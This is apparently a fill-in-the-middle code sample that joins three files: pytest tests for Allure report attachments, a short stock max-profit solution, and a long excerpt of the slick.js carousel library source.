<|file_name|>test_attach.py<|end_file_name|><|fim▁begin|># encoding: utf-8 ''' Tests for various attachment thingies Created on Oct 21, 2013 @author: pupssman<|fim▁hole|>import pytest from hamcrest import has_entries, assert_that, is_, contains, has_property from allure.constants import AttachmentType from allure.utils import all_of @pytest.mark.parametrize('package', ['pytest.allure', 'allure']) def test_smoke(report_for, package): report = report_for(""" import pytest import allure def test_x(): %s.attach('Foo', 'Bar') """ % package) assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo')))) @pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType))) def test_attach_types(report_for, a_type): report = report_for(""" import allure as A def test_x(): A.attach('Foo', 'Bar', A.attach_type.%s) """ % a_type) assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type)) class TestContents: @pytest.fixture def attach_contents(self, report_for, reportdir): """ Fixture that returns contents of the attachment file for given attach body """ def impl(body): report = report_for(""" from pytest import allure as A def test_x(): A.attach('Foo', %s, A.attach_type.TEXT) """ % repr(body)) filename = report.find('.//attachment').get('source') return reportdir.join(filename).read('rb') return impl def test_ascii(self, attach_contents): assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz')) def test_unicode(self, attach_contents): assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь')) def test_broken_unicode(self, attach_contents): assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251'))) def test_attach_in_fixture_teardown(report_for): """ Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there. """ report = report_for(""" import pytest @pytest.yield_fixture(scope='function') def myfix(): yield pytest.allure.attach('Foo', 'Bar') def test_x(myfix): assert True """) assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))<|fim▁end|>
'''
<|file_name|>solution.py<|end_file_name|><|fim▁begin|>class Solution(object): def maxProfit(self, prices): """ :type prices: List[int] :rtype: int """ low=1<<31 profit=0 for p in prices: if p<low: low=p if p-low>profit: profit=p-low<|fim▁hole|><|fim▁end|>
return profit
<|file_name|>slick.dev.js<|end_file_name|><|fim▁begin|>/* _ _ _ _ ___| (_) ___| | __ (_)___ / __| | |/ __| |/ / | / __| \__ \ | | (__| < _ | \__ \ |___/_|_|\___|_|\_(_)/ |___/ |__/ Version: 1.8.1 Author: Ken Wheeler Website: http://kenwheeler.github.io Docs: http://kenwheeler.github.io/slick Repo: http://github.com/kenwheeler/slick Issues: http://github.com/kenwheeler/slick/issues */ /* global window, document, define, jQuery, setInterval, clearInterval */ ;(function(factory) { 'use strict'; if (typeof define === 'function' && define.amd) { define(['jquery'], factory); } else if (typeof exports !== 'undefined') { module.exports = factory(require('jquery')); } else { factory(jQuery); } }(function($) { 'use strict'; var Slick = window.Slick || {}; Slick = (function() { var instanceUid = 0; function Slick(element, settings) { var _ = this, dataSettings; _.defaults = { accessibility: true, adaptiveHeight: false, appendArrows: $(element), appendDots: $(element), arrows: true, asNavFor: null, prevArrow: '<button class="slick-prev" aria-label="Previous" type="button">Previous</button>', nextArrow: '<button class="slick-next" aria-label="Next" type="button">Next</button>', autoplay: false, autoplaySpeed: 3000, centerMode: false, centerPadding: '50px', cssEase: 'ease', customPaging: function(slider, i) { return $('<button type="button" />').text(i + 1); }, dots: false, dotsClass: 'slick-dots', draggable: true, easing: 'linear', edgeFriction: 0.35, fade: false, focusOnSelect: false, focusOnChange: false, infinite: true, initialSlide: 0, lazyLoad: 'ondemand', mobileFirst: false, pauseOnHover: true, pauseOnFocus: true, pauseOnDotsHover: false, respondTo: 'window', responsive: null, rows: 1, rtl: false, slide: '', slidesPerRow: 1, slidesToShow: 1, slidesToScroll: 1, speed: 500, swipe: true, swipeToSlide: false, touchMove: true, touchThreshold: 5, useCSS: true, useTransform: true, variableWidth: false, vertical: false, verticalSwiping: false, waitForAnimate: true, zIndex: 1000 }; _.initials = { animating: false, dragging: false, autoPlayTimer: null, currentDirection: 0, currentLeft: null, currentSlide: 0, direction: 1, $dots: null, listWidth: null, listHeight: null, loadIndex: 0, $nextArrow: null, $prevArrow: null, scrolling: false, slideCount: null, slideWidth: null, $slideTrack: null, $slides: null, sliding: false, slideOffset: 0, swipeLeft: null, swiping: false, $list: null, touchObject: {}, transformsEnabled: false, unslicked: false }; $.extend(_, _.initials); _.activeBreakpoint = null; _.animType = null; _.animProp = null; _.breakpoints = []; _.breakpointSettings = []; _.cssTransitions = false; _.focussed = false; _.interrupted = false; _.hidden = 'hidden'; _.paused = true; _.positionProp = null; _.respondTo = null; _.rowCount = 1; _.shouldClick = true; _.$slider = $(element); _.$slidesCache = null; _.transformType = null; _.transitionType = null; _.visibilityChange = 'visibilitychange'; _.windowWidth = 0; _.windowTimer = null; dataSettings = $(element).data('slick') || {}; _.options = $.extend({}, _.defaults, settings, dataSettings); _.currentSlide = _.options.initialSlide; _.originalSettings = _.options; if (typeof document.mozHidden !== 'undefined') { _.hidden = 'mozHidden'; _.visibilityChange = 'mozvisibilitychange'; } else if (typeof document.webkitHidden !== 'undefined') { _.hidden = 'webkitHidden'; _.visibilityChange = 'webkitvisibilitychange'; } _.autoPlay = $.proxy(_.autoPlay, _); _.autoPlayClear = $.proxy(_.autoPlayClear, _); _.autoPlayIterator = $.proxy(_.autoPlayIterator, _); _.changeSlide = $.proxy(_.changeSlide, _); _.clickHandler = $.proxy(_.clickHandler, _); _.selectHandler = $.proxy(_.selectHandler, _); _.setPosition = $.proxy(_.setPosition, _); _.swipeHandler = $.proxy(_.swipeHandler, _); _.dragHandler = $.proxy(_.dragHandler, _); _.keyHandler = $.proxy(_.keyHandler, _); _.instanceUid = instanceUid++; // A simple way to check for HTML strings // Strict HTML recognition (must start with <) // Extracted from jQuery v1.11 source _.htmlExpr = /^(?:\s*(<[\w\W]+>)[^>]*)$/; _.registerBreakpoints(); _.init(true); } return Slick; }()); Slick.prototype.activateADA = function() { var _ = this; _.$slideTrack.find('.slick-active').attr({ 'aria-hidden': 'false' }).find('a, input, button, select').attr({ 'tabindex': '0' }); }; Slick.prototype.addSlide = Slick.prototype.slickAdd = function(markup, index, addBefore) { var _ = this; if (typeof(index) === 'boolean') { addBefore = index; index = null; } else if (index < 0 || (index >= _.slideCount)) { return false; } _.unload(); if (typeof(index) === 'number') { if (index === 0 && _.$slides.length === 0) { $(markup).appendTo(_.$slideTrack); } else if (addBefore) { $(markup).insertBefore(_.$slides.eq(index)); } else { $(markup).insertAfter(_.$slides.eq(index)); } } else { if (addBefore === true) { $(markup).prependTo(_.$slideTrack); } else { $(markup).appendTo(_.$slideTrack); } } _.$slides = _.$slideTrack.children(this.options.slide); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.append(_.$slides); _.$slides.each(function(index, element) { $(element).attr('data-slick-index', index); }); _.$slidesCache = _.$slides; _.reinit(); }; Slick.prototype.animateHeight = function() { var _ = this; if (_.options.slidesToShow === 1 && _.options.adaptiveHeight === true && _.options.vertical === false) { var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.animate({ height: targetHeight }, _.options.speed); } }; Slick.prototype.animateSlide = function(targetLeft, callback) { var animProps = {}, _ = this; _.animateHeight(); if (_.options.rtl === true && _.options.vertical === false) { targetLeft = -targetLeft; } if (_.transformsEnabled === false) { if (_.options.vertical === false) { _.$slideTrack.animate({ left: targetLeft }, _.options.speed, _.options.easing, callback); } else { _.$slideTrack.animate({ top: targetLeft }, _.options.speed, _.options.easing, callback); } } else { if (_.cssTransitions === false) { if (_.options.rtl === true) { _.currentLeft = -(_.currentLeft); } $({ animStart: _.currentLeft }).animate({ animStart: targetLeft }, { duration: _.options.speed, easing: _.options.easing, step: function(now) { now = Math.ceil(now); if (_.options.vertical === false) { animProps[_.animType] = 'translate(' + now + 'px, 0px)'; _.$slideTrack.css(animProps); } else { animProps[_.animType] = 'translate(0px,' + now + 'px)'; _.$slideTrack.css(animProps); } }, complete: function() { if (callback) { callback.call(); } } }); } else { _.applyTransition(); targetLeft = Math.ceil(targetLeft); if (_.options.vertical === false) { animProps[_.animType] = 'translate3d(' + targetLeft + 'px, 0px, 0px)'; } else { animProps[_.animType] = 'translate3d(0px,' + targetLeft + 'px, 0px)'; } _.$slideTrack.css(animProps); if (callback) { setTimeout(function() { _.disableTransition(); callback.call(); }, _.options.speed); } } } }; Slick.prototype.getNavTarget = function() { var _ = this, asNavFor = _.options.asNavFor; if ( asNavFor && asNavFor !== null ) { asNavFor = $(asNavFor).not(_.$slider); } return asNavFor; }; Slick.prototype.asNavFor = function(index) { var _ = this, asNavFor = _.getNavTarget(); if ( asNavFor !== null && typeof asNavFor === 'object' ) { asNavFor.each(function() { var target = $(this).slick('getSlick'); if(!target.unslicked) { target.slideHandler(index, true); } }); } }; Slick.prototype.applyTransition = function(slide) { var _ = this, transition = {}; if (_.options.fade === false) { transition[_.transitionType] = _.transformType + ' ' + _.options.speed + 'ms ' + _.options.cssEase; } else { transition[_.transitionType] = 'opacity ' + _.options.speed + 'ms ' + _.options.cssEase; } if (_.options.fade === false) { _.$slideTrack.css(transition); } else { _.$slides.eq(slide).css(transition); } }; Slick.prototype.autoPlay = function() { var _ = this; _.autoPlayClear(); if ( _.slideCount > _.options.slidesToShow ) { _.autoPlayTimer = setInterval( _.autoPlayIterator, _.options.autoplaySpeed ); } }; Slick.prototype.autoPlayClear = function() { var _ = this; if (_.autoPlayTimer) { clearInterval(_.autoPlayTimer); } }; Slick.prototype.autoPlayIterator = function() { var _ = this, slideTo = _.currentSlide + _.options.slidesToScroll; if ( !_.paused && !_.interrupted && !_.focussed ) { if ( _.options.infinite === false ) { if ( _.direction === 1 && ( _.currentSlide + 1 ) === ( _.slideCount - 1 )) { _.direction = 0; } else if ( _.direction === 0 ) { slideTo = _.currentSlide - _.options.slidesToScroll; if ( _.currentSlide - 1 === 0 ) { _.direction = 1; } } } _.slideHandler( slideTo ); } }; Slick.prototype.buildArrows = function() { var _ = this; if (_.options.arrows === true ) { _.$prevArrow = $(_.options.prevArrow).addClass('slick-arrow'); _.$nextArrow = $(_.options.nextArrow).addClass('slick-arrow'); if( _.slideCount > _.options.slidesToShow ) { _.$prevArrow.removeClass('slick-hidden').removeAttr('aria-hidden tabindex'); _.$nextArrow.removeClass('slick-hidden').removeAttr('aria-hidden tabindex'); if (_.htmlExpr.test(_.options.prevArrow)) { _.$prevArrow.prependTo(_.options.appendArrows); } if (_.htmlExpr.test(_.options.nextArrow)) { _.$nextArrow.appendTo(_.options.appendArrows); } if (_.options.infinite !== true) { _.$prevArrow .addClass('slick-disabled') .attr('aria-disabled', 'true'); } } else { _.$prevArrow.add( _.$nextArrow ) .addClass('slick-hidden') .attr({ 'aria-disabled': 'true', 'tabindex': '-1' }); } } }; Slick.prototype.buildDots = function() { var _ = this, i, dot; if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$slider.addClass('slick-dotted'); dot = $('<ul />').addClass(_.options.dotsClass); for (i = 0; i <= _.getDotCount(); i += 1) { dot.append($('<li />').append(_.options.customPaging.call(this, _, i))); } _.$dots = dot.appendTo(_.options.appendDots); _.$dots.find('li').first().addClass('slick-active'); } }; Slick.prototype.buildOut = function() { var _ = this; _.$slides = _.$slider .children( _.options.slide + ':not(.slick-cloned)') .addClass('slick-slide'); _.slideCount = _.$slides.length; _.$slides.each(function(index, element) { $(element) .attr('data-slick-index', index) .data('originalStyling', $(element).attr('style') || ''); }); _.$slider.addClass('slick-slider'); _.$slideTrack = (_.slideCount === 0) ? $('<div class="slick-track"/>').appendTo(_.$slider) : _.$slides.wrapAll('<div class="slick-track"/>').parent(); _.$list = _.$slideTrack.wrap( '<div class="slick-list"/>').parent(); _.$slideTrack.css('opacity', 0); if (_.options.centerMode === true || _.options.swipeToSlide === true) { _.options.slidesToScroll = 1; } $('img[data-lazy]', _.$slider).not('[src]').addClass('slick-loading'); _.setupInfinite(); _.buildArrows(); _.buildDots(); _.updateDots(); _.setSlideClasses(typeof _.currentSlide === 'number' ? _.currentSlide : 0); if (_.options.draggable === true) { _.$list.addClass('draggable'); } }; Slick.prototype.buildRows = function() { var _ = this, a, b, c, newSlides, numOfSlides, originalSlides,slidesPerSection; newSlides = document.createDocumentFragment(); originalSlides = _.$slider.children(); if(_.options.rows > 0) { slidesPerSection = _.options.slidesPerRow * _.options.rows; numOfSlides = Math.ceil( originalSlides.length / slidesPerSection ); for(a = 0; a < numOfSlides; a++){ var slide = document.createElement('div'); for(b = 0; b < _.options.rows; b++) { var row = document.createElement('div'); for(c = 0; c < _.options.slidesPerRow; c++) { var target = (a * slidesPerSection + ((b * _.options.slidesPerRow) + c)); if (originalSlides.get(target)) { row.appendChild(originalSlides.get(target)); } } slide.appendChild(row); } newSlides.appendChild(slide); } _.$slider.empty().append(newSlides); _.$slider.children().children().children() .css({ 'width':(100 / _.options.slidesPerRow) + '%', 'display': 'inline-block' }); } }; Slick.prototype.checkResponsive = function(initial, forceUpdate) { var _ = this, breakpoint, targetBreakpoint, respondToWidth, triggerBreakpoint = false; var sliderWidth = _.$slider.width(); var windowWidth = window.innerWidth || $(window).width(); if (_.respondTo === 'window') { respondToWidth = windowWidth; } else if (_.respondTo === 'slider') { respondToWidth = sliderWidth; } else if (_.respondTo === 'min') { respondToWidth = Math.min(windowWidth, sliderWidth); } if ( _.options.responsive && _.options.responsive.length && _.options.responsive !== null) { targetBreakpoint = null; for (breakpoint in _.breakpoints) { if (_.breakpoints.hasOwnProperty(breakpoint)) { if (_.originalSettings.mobileFirst === false) { if (respondToWidth < _.breakpoints[breakpoint]) { targetBreakpoint = _.breakpoints[breakpoint]; } } else { if (respondToWidth > _.breakpoints[breakpoint]) { targetBreakpoint = _.breakpoints[breakpoint]; } } } } if (targetBreakpoint !== null) { if (_.activeBreakpoint !== null) { if (targetBreakpoint !== _.activeBreakpoint || forceUpdate) { _.activeBreakpoint = targetBreakpoint; if (_.breakpointSettings[targetBreakpoint] === 'unslick') { _.unslick(targetBreakpoint); } else { _.options = $.extend({}, _.originalSettings, _.breakpointSettings[ targetBreakpoint]); if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); } triggerBreakpoint = targetBreakpoint; } } else { _.activeBreakpoint = targetBreakpoint; if (_.breakpointSettings[targetBreakpoint] === 'unslick') { _.unslick(targetBreakpoint); } else { _.options = $.extend({}, _.originalSettings, _.breakpointSettings[ targetBreakpoint]); if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); } triggerBreakpoint = targetBreakpoint; } } else { if (_.activeBreakpoint !== null) { _.activeBreakpoint = null; _.options = _.originalSettings; if (initial === true) { _.currentSlide = _.options.initialSlide; } _.refresh(initial); triggerBreakpoint = targetBreakpoint; } } // only trigger breakpoints during an actual break. not on initialize. if( !initial && triggerBreakpoint !== false ) { _.$slider.trigger('breakpoint', [_, triggerBreakpoint]); } } }; Slick.prototype.changeSlide = function(event, dontAnimate) { var _ = this, $target = $(event.currentTarget), indexOffset, slideOffset, unevenOffset; // If target is a link, prevent default action. if($target.is('a')) { event.preventDefault(); } // If target is not the <li> element (ie: a child), find the <li>. if(!$target.is('li')) { $target = $target.closest('li'); } unevenOffset = (_.slideCount % _.options.slidesToScroll !== 0); indexOffset = unevenOffset ? 0 : (_.slideCount - _.currentSlide) % _.options.slidesToScroll; switch (event.data.message) { case 'previous': slideOffset = indexOffset === 0 ? _.options.slidesToScroll : _.options.slidesToShow - indexOffset; if (_.slideCount > _.options.slidesToShow) { _.slideHandler(_.currentSlide - slideOffset, false, dontAnimate); } break; case 'next': slideOffset = indexOffset === 0 ? _.options.slidesToScroll : indexOffset; if (_.slideCount > _.options.slidesToShow) { _.slideHandler(_.currentSlide + slideOffset, false, dontAnimate); } break; case 'index': var index = event.data.index === 0 ? 0 : event.data.index || $target.index() * _.options.slidesToScroll; _.slideHandler(_.checkNavigable(index), false, dontAnimate); $target.children().trigger('focus'); break; default: return; } }; Slick.prototype.checkNavigable = function(index) { var _ = this, navigables, prevNavigable; navigables = _.getNavigableIndexes(); prevNavigable = 0; if (index > navigables[navigables.length - 1]) { index = navigables[navigables.length - 1]; } else { for (var n in navigables) { if (index < navigables[n]) { index = prevNavigable; break; } prevNavigable = navigables[n]; } } return index; }; Slick.prototype.cleanUpEvents = function() { var _ = this; if (_.options.dots && _.$dots !== null) { $('li', _.$dots) .off('click.slick', _.changeSlide) .off('mouseenter.slick', $.proxy(_.interrupt, _, true)) .off('mouseleave.slick', $.proxy(_.interrupt, _, false)); if (_.options.accessibility === true) { _.$dots.off('keydown.slick', _.keyHandler); } } _.$slider.off('focus.slick blur.slick'); if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow && _.$prevArrow.off('click.slick', _.changeSlide); _.$nextArrow && _.$nextArrow.off('click.slick', _.changeSlide); if (_.options.accessibility === true) { _.$prevArrow && _.$prevArrow.off('keydown.slick', _.keyHandler); _.$nextArrow && _.$nextArrow.off('keydown.slick', _.keyHandler); } } _.$list.off('touchstart.slick mousedown.slick', _.swipeHandler); _.$list.off('touchmove.slick mousemove.slick', _.swipeHandler); _.$list.off('touchend.slick mouseup.slick', _.swipeHandler); _.$list.off('touchcancel.slick mouseleave.slick', _.swipeHandler); _.$list.off('click.slick', _.clickHandler); $(document).off(_.visibilityChange, _.visibility); _.cleanUpSlideEvents(); if (_.options.accessibility === true) { _.$list.off('keydown.slick', _.keyHandler); } if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().off('click.slick', _.selectHandler); } $(window).off('orientationchange.slick.slick-' + _.instanceUid, _.orientationChange); $(window).off('resize.slick.slick-' + _.instanceUid, _.resize); $('[draggable!=true]', _.$slideTrack).off('dragstart', _.preventDefault); $(window).off('load.slick.slick-' + _.instanceUid, _.setPosition); }; Slick.prototype.cleanUpSlideEvents = function() { var _ = this; _.$list.off('mouseenter.slick', $.proxy(_.interrupt, _, true)); _.$list.off('mouseleave.slick', $.proxy(_.interrupt, _, false)); }; Slick.prototype.cleanUpRows = function() { var _ = this, originalSlides; if(_.options.rows > 0) { originalSlides = _.$slides.children().children(); originalSlides.removeAttr('style'); _.$slider.empty().append(originalSlides); } }; Slick.prototype.clickHandler = function(event) { var _ = this; if (_.shouldClick === false) { event.stopImmediatePropagation(); event.stopPropagation(); event.preventDefault(); } }; Slick.prototype.destroy = function(refresh) { var _ = this; _.autoPlayClear(); _.touchObject = {}; _.cleanUpEvents(); $('.slick-cloned', _.$slider).detach(); if (_.$dots) { _.$dots.remove(); } if ( _.$prevArrow && _.$prevArrow.length ) { _.$prevArrow .removeClass('slick-disabled slick-arrow slick-hidden') .removeAttr('aria-hidden aria-disabled tabindex') .css('display',''); if ( _.htmlExpr.test( _.options.prevArrow )) { _.$prevArrow.remove(); } } if ( _.$nextArrow && _.$nextArrow.length ) { _.$nextArrow .removeClass('slick-disabled slick-arrow slick-hidden') .removeAttr('aria-hidden aria-disabled tabindex') .css('display',''); if ( _.htmlExpr.test( _.options.nextArrow )) { _.$nextArrow.remove(); } } if (_.$slides) { _.$slides .removeClass('slick-slide slick-active slick-center slick-visible slick-current') .removeAttr('aria-hidden') .removeAttr('data-slick-index') .each(function(){ $(this).attr('style', $(this).data('originalStyling')); }); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.detach(); _.$list.detach(); _.$slider.append(_.$slides); } _.cleanUpRows(); _.$slider.removeClass('slick-slider'); _.$slider.removeClass('slick-initialized'); _.$slider.removeClass('slick-dotted'); _.unslicked = true; if(!refresh) { _.$slider.trigger('destroy', [_]); } }; Slick.prototype.disableTransition = function(slide) { var _ = this, transition = {}; transition[_.transitionType] = ''; if (_.options.fade === false) { _.$slideTrack.css(transition); } else { _.$slides.eq(slide).css(transition); } }; Slick.prototype.fadeSlide = function(slideIndex, callback) { var _ = this; if (_.cssTransitions === false) { _.$slides.eq(slideIndex).css({ zIndex: _.options.zIndex }); _.$slides.eq(slideIndex).animate({ opacity: 1 }, _.options.speed, _.options.easing, callback); } else { _.applyTransition(slideIndex); _.$slides.eq(slideIndex).css({ opacity: 1, zIndex: _.options.zIndex }); if (callback) { setTimeout(function() { _.disableTransition(slideIndex); callback.call(); }, _.options.speed); } } }; Slick.prototype.fadeSlideOut = function(slideIndex) { var _ = this; if (_.cssTransitions === false) { _.$slides.eq(slideIndex).animate({ opacity: 0, zIndex: _.options.zIndex - 2 }, _.options.speed, _.options.easing); } else { _.applyTransition(slideIndex); _.$slides.eq(slideIndex).css({ opacity: 0, zIndex: _.options.zIndex - 2 }); } }; Slick.prototype.filterSlides = Slick.prototype.slickFilter = function(filter) { var _ = this; if (filter !== null) { _.$slidesCache = _.$slides; _.unload(); _.$slideTrack.children(this.options.slide).detach(); _.$slidesCache.filter(filter).appendTo(_.$slideTrack); _.reinit(); } }; Slick.prototype.focusHandler = function() { var _ = this; _.$slider .off('focus.slick blur.slick') .on('focus.slick blur.slick', '*', function(event) { event.stopImmediatePropagation(); var $sf = $(this); setTimeout(function() { if( _.options.pauseOnFocus ) { _.focussed = $sf.is(':focus'); _.autoPlay(); } }, 0); }); }; Slick.prototype.getCurrent = Slick.prototype.slickCurrentSlide = function() { var _ = this; return _.currentSlide; }; Slick.prototype.getDotCount = function() { var _ = this; var breakPoint = 0; var counter = 0; var pagerQty = 0; if (_.options.infinite === true) { if (_.slideCount <= _.options.slidesToShow) { ++pagerQty; } else { while (breakPoint < _.slideCount) { ++pagerQty; breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; } } } else if (_.options.centerMode === true) { pagerQty = _.slideCount; } else if(!_.options.asNavFor) { pagerQty = 1 + Math.ceil((_.slideCount - _.options.slidesToShow) / _.options.slidesToScroll); }else { while (breakPoint < _.slideCount) { ++pagerQty; breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; } } return pagerQty - 1; }; Slick.prototype.getLeft = function(slideIndex) { var _ = this, targetLeft, verticalHeight, verticalOffset = 0, targetSlide, coef; _.slideOffset = 0; verticalHeight = _.$slides.first().outerHeight(true); if (_.options.infinite === true) { if (_.slideCount > _.options.slidesToShow) { _.slideOffset = (_.slideWidth * _.options.slidesToShow) * -1; coef = -1 if (_.options.vertical === true && _.options.centerMode === true) { if (_.options.slidesToShow === 2) { coef = -1.5; } else if (_.options.slidesToShow === 1) { coef = -2 } } verticalOffset = (verticalHeight * _.options.slidesToShow) * coef; } if (_.slideCount % _.options.slidesToScroll !== 0) { if (slideIndex + _.options.slidesToScroll > _.slideCount && _.slideCount > _.options.slidesToShow) { if (slideIndex > _.slideCount) { _.slideOffset = ((_.options.slidesToShow - (slideIndex - _.slideCount)) * _.slideWidth) * -1; verticalOffset = ((_.options.slidesToShow - (slideIndex - _.slideCount)) * verticalHeight) * -1; } else { _.slideOffset = ((_.slideCount % _.options.slidesToScroll) * _.slideWidth) * -1; verticalOffset = ((_.slideCount % _.options.slidesToScroll) * verticalHeight) * -1; } } } } else { if (slideIndex + _.options.slidesToShow > _.slideCount) { _.slideOffset = ((slideIndex + _.options.slidesToShow) - _.slideCount) * _.slideWidth; verticalOffset = ((slideIndex + _.options.slidesToShow) - _.slideCount) * verticalHeight; } } if (_.slideCount <= _.options.slidesToShow) { _.slideOffset = 0; verticalOffset = 0; } if (_.options.centerMode === true && _.slideCount <= _.options.slidesToShow) { _.slideOffset = ((_.slideWidth * Math.floor(_.options.slidesToShow)) / 2) - ((_.slideWidth * _.slideCount) / 2); } else if (_.options.centerMode === true && _.options.infinite === true) { _.slideOffset += _.slideWidth * Math.floor(_.options.slidesToShow / 2) - _.slideWidth; } else if (_.options.centerMode === true) { _.slideOffset = 0; _.slideOffset += _.slideWidth * Math.floor(_.options.slidesToShow / 2); } if (_.options.vertical === false) { targetLeft = ((slideIndex * _.slideWidth) * -1) + _.slideOffset; } else { targetLeft = ((slideIndex * verticalHeight) * -1) + verticalOffset; } if (_.options.variableWidth === true) { if (_.slideCount <= _.options.slidesToShow || _.options.infinite === false) { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex); } else { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex + _.options.slidesToShow); } if (_.options.rtl === true) { if (targetSlide[0]) { targetLeft = (_.$slideTrack.width() - targetSlide[0].offsetLeft - targetSlide.width()) * -1; } else { targetLeft = 0; } } else { targetLeft = targetSlide[0] ? targetSlide[0].offsetLeft * -1 : 0; } if (_.options.centerMode === true) { if (_.slideCount <= _.options.slidesToShow || _.options.infinite === false) { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex); } else { targetSlide = _.$slideTrack.children('.slick-slide').eq(slideIndex + _.options.slidesToShow + 1); } if (_.options.rtl === true) { if (targetSlide[0]) { targetLeft = (_.$slideTrack.width() - targetSlide[0].offsetLeft - targetSlide.width()) * -1; } else { targetLeft = 0; } } else { targetLeft = targetSlide[0] ? targetSlide[0].offsetLeft * -1 : 0; } targetLeft += (_.$list.width() - targetSlide.outerWidth()) / 2; } } return targetLeft; }; Slick.prototype.getOption = Slick.prototype.slickGetOption = function(option) { var _ = this; return _.options[option]; }; Slick.prototype.getNavigableIndexes = function() { var _ = this, breakPoint = 0, counter = 0, indexes = [], max; if (_.options.infinite === false) { max = _.slideCount; } else { breakPoint = _.options.slidesToScroll * -1; counter = _.options.slidesToScroll * -1; max = _.slideCount * 2; } var fs = 0; while (breakPoint < max) { indexes.push(breakPoint); breakPoint = counter + _.options.slidesToScroll; counter += _.options.slidesToScroll <= _.options.slidesToShow ? _.options.slidesToScroll : _.options.slidesToShow; fs++; if ( fs > 200 ) { console.log( 'WARNING! Infinite loop!' ); break; } } return indexes; }; Slick.prototype.getSlick = function() { return this; }; Slick.prototype.getSlideCount = function() { var _ = this, slidesTraversed, swipedSlide, centerOffset; centerOffset = _.options.centerMode === true ? _.slideWidth * Math.floor(_.options.slidesToShow / 2) : 0; if (_.options.swipeToSlide === true) { _.$slideTrack.find('.slick-slide').each(function(index, slide) { if (slide.offsetLeft - centerOffset + ($(slide).outerWidth() / 2) > (_.swipeLeft * -1)) { swipedSlide = slide; return false; } }); slidesTraversed = Math.abs($(swipedSlide).attr('data-slick-index') - _.currentSlide) || 1; return slidesTraversed; } else { return _.options.slidesToScroll; } }; Slick.prototype.goTo = Slick.prototype.slickGoTo = function(slide, dontAnimate) { var _ = this; _.changeSlide({ data: { message: 'index', index: parseInt(slide) } }, dontAnimate); }; Slick.prototype.init = function(creation) { var _ = this; if (!$(_.$slider).hasClass('slick-initialized')) { $(_.$slider).addClass('slick-initialized'); _.buildRows(); _.buildOut(); _.setProps(); _.startLoad(); _.loadSlider(); _.initializeEvents(); _.updateArrows(); _.updateDots(); _.checkResponsive(true); _.focusHandler(); } if (creation) { _.$slider.trigger('init', [_]); } if (_.options.accessibility === true) { _.initADA(); } if ( _.options.autoplay ) { _.paused = false; _.autoPlay(); } }; Slick.prototype.initADA = function() { var _ = this, numDotGroups = Math.ceil(_.slideCount / _.options.slidesToShow), tabControlIndexes = _.getNavigableIndexes().filter(function(val) { return (val >= 0) && (val < _.slideCount); }); _.$slides.add(_.$slideTrack.find('.slick-cloned')).attr({ 'aria-hidden': 'true', 'tabindex': '-1' }).find('a, input, button, select').attr({ 'tabindex': '-1' }); if (_.$dots !== null) { _.$slides.not(_.$slideTrack.find('.slick-cloned')).each(function(i) { var slideControlIndex = tabControlIndexes.indexOf(i); $(this).attr({ 'role': 'tabpanel', 'id': 'slick-slide' + _.instanceUid + i, 'tabindex': -1 }); if (slideControlIndex !== -1) { var ariaButtonControl = 'slick-slide-control' + _.instanceUid + slideControlIndex if ($('#' + ariaButtonControl).length) { $(this).attr({ 'aria-describedby': ariaButtonControl }); } } }); _.$dots.attr('role', 'tablist').find('li').each(function(i) { var mappedSlideIndex = tabControlIndexes[i]; $(this).attr({ 'role': 'presentation' }); $(this).find('button').first().attr({ 'role': 'tab', 'id': 'slick-slide-control' + _.instanceUid + i, 'aria-controls': 'slick-slide' + _.instanceUid + mappedSlideIndex, 'aria-label': (i + 1) + ' of ' + numDotGroups, 'aria-selected': null, 'tabindex': '-1' }); }).eq(_.currentSlide).find('button').attr({ 'aria-selected': 'true', 'tabindex': '0' }).end(); } for (var i=_.currentSlide, max=i+_.options.slidesToShow; i < max; i++) { if (_.options.focusOnChange) { _.$slides.eq(i).attr({'tabindex': '0'}); } else { _.$slides.eq(i).removeAttr('tabindex'); } } _.activateADA(); }; Slick.prototype.initArrowEvents = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow .off('click.slick') .on('click.slick', { message: 'previous' }, _.changeSlide); _.$nextArrow .off('click.slick') .on('click.slick', { message: 'next' }, _.changeSlide); if (_.options.accessibility === true) { _.$prevArrow.on('keydown.slick', _.keyHandler); _.$nextArrow.on('keydown.slick', _.keyHandler); } } }; Slick.prototype.initDotEvents = function() { var _ = this; if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { $('li', _.$dots).on('click.slick', { message: 'index' }, _.changeSlide); if (_.options.accessibility === true) { _.$dots.on('keydown.slick', _.keyHandler); } } if (_.options.dots === true && _.options.pauseOnDotsHover === true && _.slideCount > _.options.slidesToShow) { $('li', _.$dots) .on('mouseenter.slick', $.proxy(_.interrupt, _, true)) .on('mouseleave.slick', $.proxy(_.interrupt, _, false)); } }; Slick.prototype.initSlideEvents = function() { var _ = this; if ( _.options.pauseOnHover ) { _.$list.on('mouseenter.slick', $.proxy(_.interrupt, _, true)); _.$list.on('mouseleave.slick', $.proxy(_.interrupt, _, false)); } }; 